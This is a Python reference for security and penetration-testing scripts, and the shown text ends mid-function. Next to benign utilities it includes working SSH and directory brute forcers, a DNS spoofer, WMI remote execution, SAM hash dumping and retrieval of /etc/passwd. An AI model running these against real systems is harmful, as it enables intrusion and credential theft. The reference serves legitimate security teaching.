Python Reference for Security Scripts
A practical reference for writing security tools and automation scripts in Python. Each section covers a key library or technique with annotated code snippets ready for adaptation.
Table of Contents
- Environment Setup
- Socket Programming
- HTTP Requests (requests / urllib)
- Scapy — Packet Crafting and Sniffing
- Subprocess — Running System Commands
- Argparse — CLI Argument Parsing
- File I/O for Security Scripts
- Regular Expressions (re)
- JSON and XML Parsing
- Cryptography Library
- Paramiko — SSH Automation
- Impacket Basics
- Multithreading and Concurrency
- Error Handling Patterns
- Output Formatting and Logging
- Common Security Script Patterns
1. Environment Setup
Virtual Environment
Always use virtual environments to isolate dependencies:
# Create and activate a virtual environment
python3 -m venv pentest-env
source pentest-env/bin/activate # Linux/macOS
pentest-env\Scripts\activate # Windows
# Install common security libraries
pip install requests scapy paramiko impacket pycryptodome python-nmap
pip install beautifulsoup4 lxml colorama tabulate
Shebang and Encoding
#!/usr/bin/env python3
# -*- coding: utf-8 -*-
"""
Script description and usage information.
Author: Your Name
Date: 2025-01-01
"""
Import Organization
# Standard library
import os
import sys
import socket
import struct
import time
import json
import re
import argparse
import logging
import threading
from datetime import datetime
# Third-party
import requests
from scapy.all import *
import paramiko
# Local modules
from utils import format_output
2. Socket Programming
TCP Client
import socket
def tcp_client(target_host, target_port, message=""):
"""Simple TCP client for banner grabbing or sending data."""
client = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
client.settimeout(5)
try:
client.connect((target_host, target_port))
if message:
client.send(message.encode())
response = client.recv(4096)
return response.decode(errors="replace")
except socket.timeout:
return "[*] Connection timed out"
except ConnectionRefusedError:
return "[*] Connection refused"
finally:
client.close()
# Usage: banner grab
banner = tcp_client("192.168.1.10", 22)
print(f"Banner: {banner}")
TCP Server (Listener)
import socket
import threading
def handle_client(client_socket, addr):
"""Handle a single client connection."""
print(f"[*] Connection from {addr[0]}:{addr[1]}")
try:
data = client_socket.recv(4096)
print(f"[*] Received: {data.decode(errors='replace')}")
client_socket.send(b"ACK\n")
finally:
client_socket.close()
def tcp_server(bind_ip="0.0.0.0", bind_port=9999):
"""Simple TCP server / listener."""
server = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
server.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
server.bind((bind_ip, bind_port))
server.listen(5)
print(f"[*] Listening on {bind_ip}:{bind_port}")
while True:
client, addr = server.accept()
handler = threading.Thread(target=handle_client, args=(client, addr))
handler.start()
UDP Client
import socket
def udp_client(target_host, target_port, message):
"""Send a UDP datagram and receive response."""
client = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
client.settimeout(3)
try:
client.sendto(message.encode(), (target_host, target_port))
data, addr = client.recvfrom(4096)
return data.decode(errors="replace")
except socket.timeout:
return "[*] No response (UDP)"
finally:
client.close()
Port Scanner
import socket
import threading
from queue import Queue
def port_scan(target, port):
"""Scan a single port on the target."""
try:
sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
sock.settimeout(1)
result = sock.connect_ex((target, port))
if result == 0:
try:
banner = sock.recv(1024).decode(errors="replace").strip()
except socket.timeout:
banner = ""
return (port, True, banner)
return (port, False, "")
except Exception:
return (port, False, "")
finally:
sock.close()
def threaded_scan(target, ports, max_threads=100):
"""Scan multiple ports using threads."""
results = []
lock = threading.Lock()
queue = Queue()
for port in ports:
queue.put(port)
def worker():
while not queue.empty():
port = queue.get()
result = port_scan(target, port)
if result[1]: # port is open
with lock:
results.append(result)
queue.task_done()
threads = []
for _ in range(min(max_threads, len(ports))):
t = threading.Thread(target=worker)
t.daemon = True
t.start()
threads.append(t)
queue.join()
return sorted(results, key=lambda x: x[0])
# Usage
open_ports = threaded_scan("192.168.1.10", range(1, 1025))
for port, is_open, banner in open_ports:
print(f" Port {port:>5}/tcp OPEN {banner}")
Raw Sockets (Linux only)
import socket
import struct
def raw_sniffer(interface="eth0", count=10):
"""Capture raw packets (requires root on Linux)."""
# Create raw socket
raw_sock = socket.socket(socket.AF_PACKET, socket.SOCK_RAW, socket.ntohs(3))
for i in range(count):
raw_data, addr = raw_sock.recvfrom(65535)
# Parse Ethernet header (14 bytes)
eth_header = struct.unpack("!6s6sH", raw_data[:14])
dst_mac = ":".join(f"{b:02x}" for b in eth_header[0])
src_mac = ":".join(f"{b:02x}" for b in eth_header[1])
eth_type = eth_header[2]
print(f"[{i+1}] {src_mac} -> {dst_mac} (Type: 0x{eth_type:04x})")
# If IPv4 (0x0800)
if eth_type == 0x0800:
ip_header = struct.unpack("!BBHHHBBH4s4s", raw_data[14:34])
src_ip = socket.inet_ntoa(ip_header[8])
dst_ip = socket.inet_ntoa(ip_header[9])
protocol = ip_header[6]
print(f" IP: {src_ip} -> {dst_ip} (Proto: {protocol})")
3. HTTP Requests
Basic GET/POST with requests
import requests
from requests.exceptions import RequestException
def web_request(url, method="GET", data=None, headers=None,
cookies=None, proxy=None, verify=True, timeout=10):
"""Flexible HTTP request wrapper."""
proxies = {"http": proxy, "https": proxy} if proxy else None
default_headers = {
"User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64) "
"AppleWebKit/537.36 (KHTML, like Gecko) "
"Chrome/120.0.0.0 Safari/537.36"
}
if headers:
default_headers.update(headers)
try:
if method.upper() == "GET":
resp = requests.get(url, headers=default_headers, cookies=cookies,
proxies=proxies, verify=verify, timeout=timeout)
elif method.upper() == "POST":
resp = requests.post(url, data=data, headers=default_headers,
cookies=cookies, proxies=proxies,
verify=verify, timeout=timeout)
return resp
except RequestException as e:
print(f"[!] Request failed: {e}")
return None
# Usage
resp = web_request("https://example.com")
print(f"Status: {resp.status_code}")
print(f"Headers: {dict(resp.headers)}")
print(f"Body length: {len(resp.text)}")
Session Handling
import requests
def authenticated_session(login_url, username, password):
"""Create and return an authenticated session."""
session = requests.Session()
# Authenticate
login_data = {"username": username, "password": password}
resp = session.post(login_url, data=login_data)
if resp.status_code == 200 and "logout" in resp.text.lower():
print("[+] Authentication successful")
return session
else:
print("[-] Authentication failed")
return None
# Usage
session = authenticated_session(
"http://target.com/login",
"admin",
"password123"
)
if session:
# Authenticated requests
dashboard = session.get("http://target.com/dashboard")
Directory Brute Forcer
import requests
from concurrent.futures import ThreadPoolExecutor
def dir_brute(target_url, wordlist_path, extensions=None, threads=20):
"""Brute-force directories and files on a web server."""
extensions = extensions or [""]
found = []
with open(wordlist_path, "r") as f:
words = [line.strip() for line in f if line.strip()]
def check_path(word):
for ext in extensions:
path = f"{word}{ext}" if ext else word
url = f"{target_url.rstrip('/')}/{path}"
try:
resp = requests.get(url, timeout=5, allow_redirects=False)
if resp.status_code not in [404, 403]:
result = f"[{resp.status_code}] {url} (Size: {len(resp.content)})"
print(result)
found.append((resp.status_code, url, len(resp.content)))
except requests.RequestException:
pass
with ThreadPoolExecutor(max_workers=threads) as executor:
executor.map(check_path, words)
return found
Handling Proxies (Burp Suite Integration)
import requests
import urllib3
# Suppress InsecureRequestWarning when using Burp
urllib3.disable_warnings(urllib3.exceptions.InsecureRequestWarning)
BURP_PROXY = {"http": "http://127.0.0.1:8080", "https": "http://127.0.0.1:8080"}
# All traffic routes through Burp Suite
resp = requests.get(
"https://target.com/api/users",
proxies=BURP_PROXY,
verify=False # Required for Burp's self-signed cert
)
4. Scapy — Packet Crafting and Sniffing
Basic Packet Construction
from scapy.all import *
# Build an ICMP echo request (ping)
packet = IP(dst="192.168.1.1") / ICMP()
response = sr1(packet, timeout=2, verbose=0)
if response:
print(f"[+] {response.src} is alive (TTL: {response.ttl})")
# Build a TCP SYN packet
syn_packet = IP(dst="192.168.1.10") / TCP(dport=80, flags="S")
response = sr1(syn_packet, timeout=2, verbose=0)
if response and response.haslayer(TCP):
if response[TCP].flags == 0x12: # SYN-ACK
print("[+] Port 80 is OPEN")
elif response[TCP].flags == 0x14: # RST-ACK
print("[-] Port 80 is CLOSED")
SYN Scanner
from scapy.all import *
def syn_scan(target, ports):
"""Perform a SYN scan using Scapy (requires root)."""
open_ports = []
for port in ports:
pkt = IP(dst=target) / TCP(dport=port, flags="S")
resp = sr1(pkt, timeout=1, verbose=0)
if resp is not None and resp.haslayer(TCP):
if resp[TCP].flags == 0x12: # SYN-ACK
open_ports.append(port)
# Send RST to close (be polite)
rst = IP(dst=target) / TCP(dport=port, flags="R")
send(rst, verbose=0)
return open_ports
# Usage
results = syn_scan("192.168.1.10", [21, 22, 80, 443, 445, 3389])
print(f"Open ports: {results}")
ARP Scanner (Network Discovery)
from scapy.all import *
def arp_scan(network):
"""Discover live hosts on a network using ARP."""
arp_request = ARP(pdst=network)
broadcast = Ether(dst="ff:ff:ff:ff:ff:ff")
packet = broadcast / arp_request
answered, _ = srp(packet, timeout=2, verbose=0)
hosts = []
for sent, received in answered:
hosts.append({
"ip": received.psrc,
"mac": received.hwsrc
})
return hosts
# Usage
hosts = arp_scan("192.168.1.0/24")
for host in hosts:
print(f" {host['ip']:>15} {host['mac']}")
Packet Sniffer
from scapy.all import *
from datetime import datetime
def packet_callback(packet):
"""Process each captured packet."""
timestamp = datetime.now().strftime("%H:%M:%S")
if packet.haslayer(TCP):
src = f"{packet[IP].src}:{packet[TCP].sport}"
dst = f"{packet[IP].dst}:{packet[TCP].dport}"
flags = packet[TCP].flags
print(f"[{timestamp}] TCP {src} -> {dst} [{flags}]")
# Check for HTTP data
if packet.haslayer(Raw):
payload = packet[Raw].load.decode(errors="replace")
if "HTTP" in payload or "GET" in payload or "POST" in payload:
print(f" HTTP: {payload[:100]}")
elif packet.haslayer(UDP):
src = f"{packet[IP].src}:{packet[UDP].sport}"
dst = f"{packet[IP].dst}:{packet[UDP].dport}"
print(f"[{timestamp}] UDP {src} -> {dst}")
# Usage: sniff HTTP traffic
sniff(filter="tcp port 80", prn=packet_callback, count=50)
DNS Spoofing Example
from scapy.all import *
def dns_spoof(packet):
"""Respond to DNS queries with a spoofed IP."""
if packet.haslayer(DNSQR):
queried_domain = packet[DNSQR].qname.decode()
spoofed_ip = "192.168.1.100" # Attacker's IP
spoofed_pkt = (
IP(dst=packet[IP].src, src=packet[IP].dst) /
UDP(dport=packet[UDP].sport, sport=53) /
DNS(
id=packet[DNS].id,
qr=1, aa=1, qd=packet[DNS].qd,
an=DNSRR(rrname=queried_domain, ttl=300, rdata=spoofed_ip)
)
)
send(spoofed_pkt, verbose=0)
print(f"[*] Spoofed {queried_domain} -> {spoofed_ip}")
# Usage (requires ARP spoofing or network position)
sniff(filter="udp port 53", prn=dns_spoof)
5. Subprocess — Running System Commands
Safe Command Execution
import subprocess
import shlex
def run_command(command, timeout=30):
"""Execute a system command and return output."""
try:
# Use shlex.split for safe argument parsing
args = shlex.split(command)
result = subprocess.run(
args,
capture_output=True,
text=True,
timeout=timeout
)
return {
"stdout": result.stdout,
"stderr": result.stderr,
"returncode": result.returncode
}
except subprocess.TimeoutExpired:
return {"stdout": "", "stderr": "Command timed out", "returncode": -1}
except FileNotFoundError:
return {"stdout": "", "stderr": "Command not found", "returncode": -1}
# Usage
result = run_command("nmap -sV -p 80,443 192.168.1.10")
print(result["stdout"])
Running Nmap from Python
import subprocess
import xml.etree.ElementTree as ET
def nmap_scan(target, arguments="-sV -sC"):
"""Run Nmap and parse XML output."""
cmd = f"nmap {arguments} -oX - {target}"
result = subprocess.run(
shlex.split(cmd),
capture_output=True, text=True, timeout=300
)
if result.returncode != 0:
print(f"[!] Nmap error: {result.stderr}")
return None
# Parse XML output
root = ET.fromstring(result.stdout)
hosts = []
for host in root.findall("host"):
addr = host.find("address").get("addr")
ports = []
for port in host.findall(".//port"):
port_info = {
"port": port.get("portid"),
"protocol": port.get("protocol"),
"state": port.find("state").get("state"),
"service": port.find("service").get("name", "unknown"),
"version": port.find("service").get("product", "")
}
ports.append(port_info)
hosts.append({"ip": addr, "ports": ports})
return hosts
Piping Between Commands
import subprocess
def pipe_commands(cmd1, cmd2):
"""Pipe output of cmd1 into cmd2."""
p1 = subprocess.Popen(
shlex.split(cmd1),
stdout=subprocess.PIPE
)
p2 = subprocess.Popen(
shlex.split(cmd2),
stdin=p1.stdout,
stdout=subprocess.PIPE,
text=True
)
p1.stdout.close()
output, _ = p2.communicate()
return output
# Example: grep specific lines from nmap output
result = pipe_commands(
"nmap -sV 192.168.1.0/24",
"grep 'open'"
)
6. Argparse — CLI Argument Parsing
Professional CLI Tool Template
#!/usr/bin/env python3
"""
Security Tool Template
Usage: python3 tool.py -t TARGET -p PORTS [options]
"""
import argparse
import sys
def parse_args():
parser = argparse.ArgumentParser(
description="Network Security Scanner",
formatter_class=argparse.RawDescriptionHelpFormatter,
epilog="""
Examples:
%(prog)s -t 192.168.1.10 -p 1-1024
%(prog)s -t 10.0.0.0/24 -p 80,443,8080 --threads 50
%(prog)s -t targets.txt -p top100 -o results.json
"""
)
# Required arguments
parser.add_argument("-t", "--target", required=True,
help="Target IP, range, CIDR, or file")
parser.add_argument("-p", "--ports", required=True,
help="Port(s): single, range (1-1024), "
"comma-separated, or 'top100'")
# Optional arguments
parser.add_argument("-o", "--output", help="Output file path")
parser.add_argument("-f", "--format",
choices=["text", "json", "csv"],
default="text", help="Output format (default: text)")
parser.add_argument("--threads", type=int, default=10,
help="Number of threads (default: 10)")
parser.add_argument("--timeout", type=float, default=2.0,
help="Connection timeout in seconds (default: 2.0)")
parser.add_argument("-v", "--verbose", action="count", default=0,
help="Increase verbosity (-v, -vv, -vvv)")
parser.add_argument("-q", "--quiet", action="store_true",
help="Suppress banner and status messages")
return parser.parse_args()
def parse_ports(port_string):
"""Parse port specification into a list of integers."""
ports = set()
for part in port_string.split(","):
if "-" in part:
start, end = part.split("-", 1)
ports.update(range(int(start), int(end) + 1))
elif part.lower() == "top100":
ports.update([21,22,23,25,53,80,110,111,135,139,143,443,
445,993,995,1723,3306,3389,5900,8080])
else:
ports.add(int(part))
return sorted(ports)
if __name__ == "__main__":
args = parse_args()
ports = parse_ports(args.ports)
# ... rest of the tool logic
7. File I/O for Security Scripts
Reading Wordlists and Target Files
def load_wordlist(filepath):
"""Load a wordlist, stripping comments and blank lines."""
words = []
with open(filepath, "r", encoding="utf-8", errors="replace") as f:
for line in f:
line = line.strip()
if line and not line.startswith("#"):
words.append(line)
return words
def load_targets(filepath):
"""Load targets from a file (one per line, supports CIDR)."""
import ipaddress
targets = []
with open(filepath, "r") as f:
for line in f:
line = line.strip()
if not line or line.startswith("#"):
continue
try:
# Try as network (CIDR)
network = ipaddress.ip_network(line, strict=False)
targets.extend(str(ip) for ip in network.hosts())
except ValueError:
# Treat as hostname
targets.append(line)
return targets
Writing Structured Output
import json
import csv
from datetime import datetime
def write_results(results, output_path, fmt="json"):
"""Write scan results to file in specified format."""
if fmt == "json":
with open(output_path, "w") as f:
json.dump({
"scan_date": datetime.now().isoformat(),
"results": results
}, f, indent=2)
elif fmt == "csv":
if not results:
return
with open(output_path, "w", newline="") as f:
writer = csv.DictWriter(f, fieldnames=results[0].keys())
writer.writeheader()
writer.writerows(results)
elif fmt == "text":
with open(output_path, "w") as f:
for r in results:
f.write(f"{r}\n")
print(f"[+] Results written to {output_path}")
Binary File Handling
def read_binary_file(filepath):
"""Read a binary file and return bytes."""
with open(filepath, "rb") as f:
return f.read()
def hexdump(data, length=16):
"""Display binary data as a hex dump."""
result = []
for i in range(0, len(data), length):
chunk = data[i:i+length]
hex_str = " ".join(f"{b:02x}" for b in chunk)
ascii_str = "".join(chr(b) if 32 <= b < 127 else "." for b in chunk)
result.append(f"{i:08x} {hex_str:<{length*3}} |{ascii_str}|")
return "\n".join(result)
# Usage
data = read_binary_file("/path/to/binary")
print(hexdump(data[:256]))
8. Regular Expressions (re)
Common Security Patterns
import re
# IP Address extraction
IP_PATTERN = re.compile(
r'\b(?:(?:25[0-5]|2[0-4]\d|[01]?\d\d?)\.){3}'
r'(?:25[0-5]|2[0-4]\d|[01]?\d\d?)\b'
)
# Email extraction
EMAIL_PATTERN = re.compile(
r'[a-zA-Z0-9._%+-]+@[a-zA-Z0-9.-]+\.[a-zA-Z]{2,}'
)
# URL extraction
URL_PATTERN = re.compile(
r'https?://[^\s<>"\']+|www\.[^\s<>"\']+'
)
# Hash detection
MD5_PATTERN = re.compile(r'\b[a-fA-F0-9]{32}\b')
SHA1_PATTERN = re.compile(r'\b[a-fA-F0-9]{40}\b')
SHA256_PATTERN = re.compile(r'\b[a-fA-F0-9]{64}\b')
# Password pattern in source code
PASSWORD_PATTERNS = re.compile(
r'(?:password|passwd|pwd|secret|api_key|apikey|token|auth)'
r'\s*[=:]\s*["\']([^"\']+)["\']',
re.IGNORECASE
)
# Credit card patterns
CC_PATTERN = re.compile(
r'\b(?:\d[ -]*?){13,16}\b'
)
# Base64-encoded strings
BASE64_PATTERN = re.compile(
r'[A-Za-z0-9+/]{20,}={0,2}'
)
def extract_all(text):
"""Extract all interesting artifacts from text."""
return {
"ips": IP_PATTERN.findall(text),
"emails": EMAIL_PATTERN.findall(text),
"urls": URL_PATTERN.findall(text),
"md5_hashes": MD5_PATTERN.findall(text),
"sha1_hashes": SHA1_PATTERN.findall(text),
"sha256_hashes": SHA256_PATTERN.findall(text),
"passwords": PASSWORD_PATTERNS.findall(text),
"base64_strings": BASE64_PATTERN.findall(text),
}
# Usage
with open("logfile.txt") as f:
artifacts = extract_all(f.read())
for category, items in artifacts.items():
if items:
print(f"\n{category}: {len(items)} found")
for item in items[:5]:
print(f" {item}")
Log File Parsing
import re
from collections import Counter
# Apache access log pattern
APACHE_LOG = re.compile(
r'(?P<ip>\S+) \S+ \S+ '
r'\[(?P[^\]]+)\] '
r'"(?P<method>\S+) (?P<path>\S+) \S+" '
r'(?P<status>\d+) (?P<size>\S+)'
)
def parse_access_log(filepath):
"""Parse Apache/Nginx access log and find suspicious activity."""
ip_counter = Counter()
failed_logins = []
suspicious_paths = []
suspicious_keywords = [
"union", "select", "../../", "etc/passwd",
"<script", "cmd.exe", "eval(", "system("
]
with open(filepath) as f:
for line in f:
match = APACHE_LOG.match(line)
if not match:
continue
ip = match.group("ip")
path = match.group("path")
status = match.group("status")
ip_counter[ip] += 1
# Check for SQL injection / traversal attempts
path_lower = path.lower()
for keyword in suspicious_keywords:
if keyword in path_lower:
suspicious_paths.append((ip, path, status))
break
# Check for authentication failures
if status in ["401", "403"] and "login" in path_lower:
failed_logins.append((ip, path))
return {
"top_ips": ip_counter.most_common(20),
"suspicious_requests": suspicious_paths,
"failed_logins": failed_logins
}
9. JSON and XML Parsing
JSON (API Responses)
import json
# Parse API response
def parse_api_response(response_text):
"""Parse and extract data from JSON API response."""
try:
data = json.loads(response_text)
except json.JSONDecodeError as e:
print(f"[!] Invalid JSON: {e}")
return None
# Navigate nested structures safely
def safe_get(d, *keys, default=None):
for key in keys:
if isinstance(d, dict):
d = d.get(key, default)
elif isinstance(d, list) and isinstance(key, int):
d = d[key] if key < len(d) else default
else:
return default
return d
# Example: extract user data
users = safe_get(data, "results", default=[])
return users
# Pretty-print JSON for analysis
def print_json(data):
print(json.dumps(data, indent=2, default=str))
XML (Nmap Output, SAML, SOAP)
import xml.etree.ElementTree as ET
def parse_nmap_xml(xml_file):
"""Parse Nmap XML output file."""
tree = ET.parse(xml_file)
root = tree.getroot()
results = []
for host in root.findall("host"):
host_info = {
"ip": host.find("address").get("addr"),
"state": host.find("status").get("state"),
"ports": []
}
for port in host.findall(".//port"):
service = port.find("service")
port_info = {
"port": int(port.get("portid")),
"protocol": port.get("protocol"),
"state": port.find("state").get("state"),
"service": service.get("name", "") if service is not None else "",
"product": service.get("product", "") if service is not None else "",
"version": service.get("version", "") if service is not None else "",
}
# Extract script output
scripts = {}
for script in port.findall("script"):
scripts[script.get("id")] = script.get("output")
if scripts:
port_info["scripts"] = scripts
host_info["ports"].append(port_info)
results.append(host_info)
return results
# Parse SAML assertions (for security testing)
def extract_saml_attributes(saml_response_xml):
"""Extract attributes from a SAML Response."""
ns = {
"saml": "urn:oasis:names:tc:SAML:2.0:assertion",
"samlp": "urn:oasis:names:tc:SAML:2.0:protocol"
}
root = ET.fromstring(saml_response_xml)
attributes = {}
for attr in root.findall(".//saml:Attribute", ns):
name = attr.get("Name")
values = [v.text for v in attr.findall("saml:AttributeValue", ns)]
attributes[name] = values
return attributes
10. Cryptography Library
Hashing
import hashlib
def hash_string(text, algorithm="sha256"):
"""Hash a string with the specified algorithm."""
h = hashlib.new(algorithm)
h.update(text.encode())
return h.hexdigest()
def hash_file(filepath, algorithm="sha256"):
"""Calculate file hash."""
h = hashlib.new(algorithm)
with open(filepath, "rb") as f:
while chunk := f.read(8192):
h.update(chunk)
return h.hexdigest()
# Common hash types
text = "password123"
print(f"MD5: {hash_string(text, 'md5')}")
print(f"SHA1: {hash_string(text, 'sha1')}")
print(f"SHA256: {hash_string(text, 'sha256')}")
print(f"SHA512: {hash_string(text, 'sha512')}")
AES Encryption/Decryption
from Crypto.Cipher import AES
from Crypto.Random import get_random_bytes
from Crypto.Util.Padding import pad, unpad
import base64
def aes_encrypt(plaintext, key):
"""Encrypt using AES-256-CBC."""
iv = get_random_bytes(16)
cipher = AES.new(key, AES.MODE_CBC, iv)
ciphertext = cipher.encrypt(pad(plaintext.encode(), AES.block_size))
return base64.b64encode(iv + ciphertext).decode()
def aes_decrypt(encrypted_b64, key):
"""Decrypt AES-256-CBC."""
raw = base64.b64decode(encrypted_b64)
iv = raw[:16]
ciphertext = raw[16:]
cipher = AES.new(key, AES.MODE_CBC, iv)
plaintext = unpad(cipher.decrypt(ciphertext), AES.block_size)
return plaintext.decode()
# Usage
key = get_random_bytes(32) # 256-bit key
encrypted = aes_encrypt("Sensitive data here", key)
decrypted = aes_decrypt(encrypted, key)
print(f"Encrypted: {encrypted}")
print(f"Decrypted: {decrypted}")
RSA Key Generation and Usage
from Crypto.PublicKey import RSA
from Crypto.Cipher import PKCS1_OAEP
from Crypto.Signature import pkcs1_15
from Crypto.Hash import SHA256
# Generate RSA key pair
key = RSA.generate(2048)
private_key = key.export_key()
public_key = key.publickey().export_key()
# Encrypt with public key
def rsa_encrypt(plaintext, pub_key_pem):
pub_key = RSA.import_key(pub_key_pem)
cipher = PKCS1_OAEP.new(pub_key)
return cipher.encrypt(plaintext.encode())
# Decrypt with private key
def rsa_decrypt(ciphertext, priv_key_pem):
priv_key = RSA.import_key(priv_key_pem)
cipher = PKCS1_OAEP.new(priv_key)
return cipher.decrypt(ciphertext).decode()
# Sign and verify
def sign_data(data, priv_key_pem):
priv_key = RSA.import_key(priv_key_pem)
h = SHA256.new(data.encode())
signature = pkcs1_15.new(priv_key).sign(h)
return signature
def verify_signature(data, signature, pub_key_pem):
pub_key = RSA.import_key(pub_key_pem)
h = SHA256.new(data.encode())
try:
pkcs1_15.new(pub_key).verify(h, signature)
return True
except (ValueError, TypeError):
return False
Password Hashing (bcrypt)
import bcrypt
def hash_password(password):
"""Hash a password with bcrypt."""
salt = bcrypt.gensalt(rounds=12)
return bcrypt.hashpw(password.encode(), salt)
def verify_password(password, hashed):
"""Verify a password against a bcrypt hash."""
return bcrypt.checkpw(password.encode(), hashed)
# Usage
hashed = hash_password("my_secure_password")
print(f"Hash: {hashed.decode()}")
print(f"Valid: {verify_password('my_secure_password', hashed)}")
print(f"Invalid: {verify_password('wrong_password', hashed)}")
11. Paramiko — SSH Automation
SSH Command Execution
import paramiko
def ssh_execute(hostname, username, password=None, key_file=None,
command="id", port=22):
"""Execute a command over SSH."""
client = paramiko.SSHClient()
client.set_missing_host_key_policy(paramiko.AutoAddPolicy())
try:
connect_kwargs = {
"hostname": hostname,
"port": port,
"username": username,
"timeout": 10,
}
if key_file:
connect_kwargs["key_filename"] = key_file
else:
connect_kwargs["password"] = password
client.connect(**connect_kwargs)
stdin, stdout, stderr = client.exec_command(command)
return {
"stdout": stdout.read().decode(),
"stderr": stderr.read().decode(),
"exit_code": stdout.channel.recv_exit_status()
}
except paramiko.AuthenticationException:
return {"error": "Authentication failed"}
except paramiko.SSHException as e:
return {"error": f"SSH error: {e}"}
except Exception as e:
return {"error": f"Connection error: {e}"}
finally:
client.close()
# Usage
result = ssh_execute("192.168.1.10", "admin", password="admin123",
command="uname -a")
print(result["stdout"])
SSH Brute Forcer
import paramiko
import threading
from queue import Queue
def ssh_brute(hostname, username, wordlist_path, port=22, threads=5):
"""Attempt SSH login with passwords from wordlist."""
found = threading.Event()
password_queue = Queue()
with open(wordlist_path) as f:
for line in f:
password_queue.put(line.strip())
def try_login():
while not password_queue.empty() and not found.is_set():
password = password_queue.get()
client = paramiko.SSHClient()
client.set_missing_host_key_policy(paramiko.AutoAddPolicy())
try:
client.connect(hostname, port=port, username=username,
password=password, timeout=3,
banner_timeout=3, auth_timeout=3)
found.set()
print(f"[+] FOUND: {username}:{password}")
client.close()
return password
except paramiko.AuthenticationException:
pass # Wrong password
except Exception:
pass # Connection error
finally:
password_queue.task_done()
workers = []
for _ in range(threads):
t = threading.Thread(target=try_login)
t.daemon = True
t.start()
workers.append(t)
password_queue.join()
return None
SFTP File Operations
import paramiko
def sftp_operations(hostname, username, password, port=22):
"""Demonstrate SFTP file operations."""
transport = paramiko.Transport((hostname, port))
transport.connect(username=username, password=password)
sftp = paramiko.SFTPClient.from_transport(transport)
try:
# List directory
files = sftp.listdir("/tmp")
print(f"Files in /tmp: {files[:10]}")
# Download file
sftp.get("/etc/passwd", "downloaded_passwd.txt")
# Upload file
sftp.put("local_script.sh", "/tmp/uploaded_script.sh")
# Read file content
with sftp.open("/etc/hostname", "r") as f:
hostname_content = f.read().decode()
print(f"Hostname: {hostname_content.strip()}")
finally:
sftp.close()
transport.close()
12. Impacket Basics
SMB Enumeration
from impacket.smbconnection import SMBConnection
def smb_enumerate(target, username="", password="", domain=""):
"""Enumerate SMB shares and basic info."""
try:
conn = SMBConnection(target, target, sess_port=445)
if username:
conn.login(username, password, domain)
else:
conn.login("", "") # Null session
print(f"[*] OS: {conn.getServerOS()}")
print(f"[*] Domain: {conn.getServerDomain()}")
print(f"[*] Hostname: {conn.getServerName()}")
# List shares
shares = conn.listShares()
print(f"\n[*] Shares:")
for share in shares:
name = share["shi1_netname"][:-1] # Remove null byte
comment = share["shi1_remark"][:-1]
print(f" {name:<20} {comment}")
# Try to list files in share
try:
files = conn.listPath(name, "*")
for f in files[:5]:
print(f" -> {f.get_longname()}")
except Exception:
print(f" -> [Access Denied]")
conn.logoff()
except Exception as e:
print(f"[!] Error: {e}")
Executing Commands via WMI
from impacket.dcerpc.v5.dcomrt import DCOMConnection
from impacket.dcerpc.v5.dcom.wmi import WBEM_FLAG_FORWARD_ONLY
import impacket.dcerpc.v5.dcom.wmi as wmi
def wmi_exec(target, username, password, domain, command):
"""Execute a command via WMI."""
try:
dcom = DCOMConnection(target, username, password, domain)
iInterface = dcom.CoCreateInstanceEx(
wmi.CLSID_WbemLevel1Login, wmi.IID_IWbemLevel1Login
)
iWbemLevel1Login = wmi.IWbemLevel1Login(iInterface)
iWbemServices = iWbemLevel1Login.NTLMLogin("//./root/cimv2", None, None)
iWbemLevel1Login.RemRelease()
win32_process, _ = iWbemServices.GetObject("Win32_Process")
win32_process.Create(command, "C:\\", None)
print(f"[+] Command executed on {target}: {command}")
dcom.disconnect()
except Exception as e:
print(f"[!] WMI exec failed: {e}")
Secretsdump (Hash Extraction)
# Impacket's secretsdump functionality (conceptual usage)
# In practice, use the command-line tool:
# secretsdump.py domain/user:password@target
from impacket.examples.secretsdump import RemoteOperations, SAMHashes
def dump_sam(target, username, password, domain=""):
"""Dump SAM hashes from a remote Windows host."""
try:
from impacket.smbconnection import SMBConnection
conn = SMBConnection(target, target)
conn.login(username, password, domain)
remote_ops = RemoteOperations(conn, False)
remote_ops.enableRegistry()
sam_hashes = SAMHashes(
remote_ops.saveSAM(),
remote_ops._RemoteOperations__bootKey,
isRemote=True
)
sam_hashes.dump()
sam_hashes.export("sam_hashes.txt")
remote_ops.finish()
conn.logoff()
except Exception as e:
print(f"[!] Error: {e}")
13. Multithreading and Concurrency
Thread Pool Pattern
from concurrent.futures import ThreadPoolExecutor, as_completed
import threading
def scan_target(target):
"""Placeholder scan function."""
# ... scanning logic ...
return {"target": target, "status": "open"}
def parallel_scan(targets, max_workers=50):
"""Scan multiple targets in parallel."""
results = []
lock = threading.Lock()
with ThreadPoolExecutor(max_workers=max_workers) as executor:
future_to_target = {
executor.submit(scan_target, target): target
for target in targets
}
for future in as_completed(future_to_target):
target = future_to_target[future]
try:
result = future.result(timeout=10)
with lock:
results.append(result)
except Exception as e:
print(f"[!] {target}: {e}")
return results
Async Pattern (for high-volume I/O)
import asyncio
import aiohttp
async def async_check_url(session, url):
"""Check a single URL asynchronously."""
try:
async with session.get(url, timeout=aiohttp.ClientTimeout(total=5),
ssl=False) as resp:
return {
"url": url,
"status": resp.status,
"size": len(await resp.text())
}
except Exception as e:
return {"url": url, "error": str(e)}
async def async_url_checker(urls, concurrency=50):
"""Check multiple URLs concurrently."""
semaphore = asyncio.Semaphore(concurrency)
results = []
async def bounded_check(session, url):
async with semaphore:
return await async_check_url(session, url)
async with aiohttp.ClientSession() as session:
tasks = [bounded_check(session, url) for url in urls]
results = await asyncio.gather(*tasks)
return results
# Usage
# urls = ["http://target.com/page1", "http://target.com/page2", ...]
# results = asyncio.run(async_url_checker(urls))
Rate-Limited Scanner
import threading
import time
class RateLimiter:
"""Token bucket rate limiter."""
def __init__(self, rate_per_second):
self.rate = rate_per_second
self.tokens = rate_per_second
self.lock = threading.Lock()
self.last_time = time.time()
def acquire(self):
with self.lock:
now = time.time()
elapsed = now - self.last_time
self.tokens = min(self.rate, self.tokens + elapsed * self.rate)
self.last_time = now
if self.tokens >= 1:
self.tokens -= 1
return True
return False
def wait(self):
while not self.acquire():
time.sleep(0.01)
# Usage with scanning
limiter = RateLimiter(100) # 100 requests/second
def rate_limited_scan(target):
